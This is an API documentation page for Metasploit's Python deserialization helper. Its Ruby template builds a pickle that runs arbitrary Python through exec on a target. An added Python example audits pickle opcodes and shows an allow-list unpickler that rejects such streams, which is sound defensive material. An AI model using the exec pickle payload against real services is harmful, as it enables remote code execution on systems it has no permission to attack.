Class: Msf::Util::PythonDeserialization

Inherits:
Object
Defined in:
lib/msf/util/python_deserialization.rb

Overview

Python deserialization class

Constant Summary

In the future, this could be a list of payloads used to exploit the Python deserialization vulnerability.

PAYLOADS =

{
  # this payload will work with Python 3.x targets to execute Python code in place
  py3_exec: proc do |python_code|
    escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
    %|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
  end
}
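
Seen from the receiving side, the stream that `py3_exec` emits is a protocol 0 pickle whose `GLOBAL` opcode imports a callable and whose `REDUCE` opcode calls it. The following is an added example in Python, not part of the Metasploit code documented here; `SAMPLE`, `audit_pickle`, `AllowListUnpickler` and `safe_loads` are hypothetical names. It flags those opcodes without unpickling anything, and shows an allow-list unpickler that rejects the stream.

```python
import io
import pickle
import pickletools

# Opcodes that import a global, and opcodes that call what was imported.
IMPORT_OPS = {"GLOBAL", "STACK_GLOBAL", "INST"}
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}

# Constructed sample: the py3_exec template above with the harmless code "pass".
SAMPLE = b"c__builtin__\nexec\np0\n(Vpass\np1\ntp2\nRp3\n."


def audit_pickle(data: bytes):
    """Walk the opcode stream without unpickling; return (imports, calls)."""
    imports, calls = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in IMPORT_OPS:
            # GLOBAL/INST carry "module name"; STACK_GLOBAL takes both from the stack.
            imports.append(arg if arg is not None else "<from stack>")
        if op.name in CALL_OPS:
            calls.append(op.name)
    return imports, calls


class AllowListUnpickler(pickle.Unpickler):
    """Unpickler that resolves only globals the application explicitly allows."""

    ALLOWED = frozenset()  # (module, name) pairs; empty means plain data only

    def find_class(self, module, name):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data: bytes):
    """Stand-in for pickle.loads() on untrusted input (hypothetical helper)."""
    return AllowListUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    print(audit_pickle(SAMPLE))
    try:
        safe_loads(SAMPLE)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

Plain data (dicts, lists, strings, numbers) contains no import opcode, so it passes both checks unchanged.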

Class Method Summary

Class Method Details

.payload(payload_name, command = nil) ⇒ Object

Raises:

  • (ArgumentError)


# File 'lib/msf/util/python_deserialization.rb', line 17

def self.payload(payload_name, command = nil)

  raise ArgumentError, "#{payload_name} payload not found in payloads" unless payload_names.include? payload_name.to_sym

  PAYLOADS[payload_name.to_sym].call(command)
end

.payload_names ⇒ Object



# File 'lib/msf/util/python_deserialization.rb', line 24

def self.payload_names
  PAYLOADS.keys
end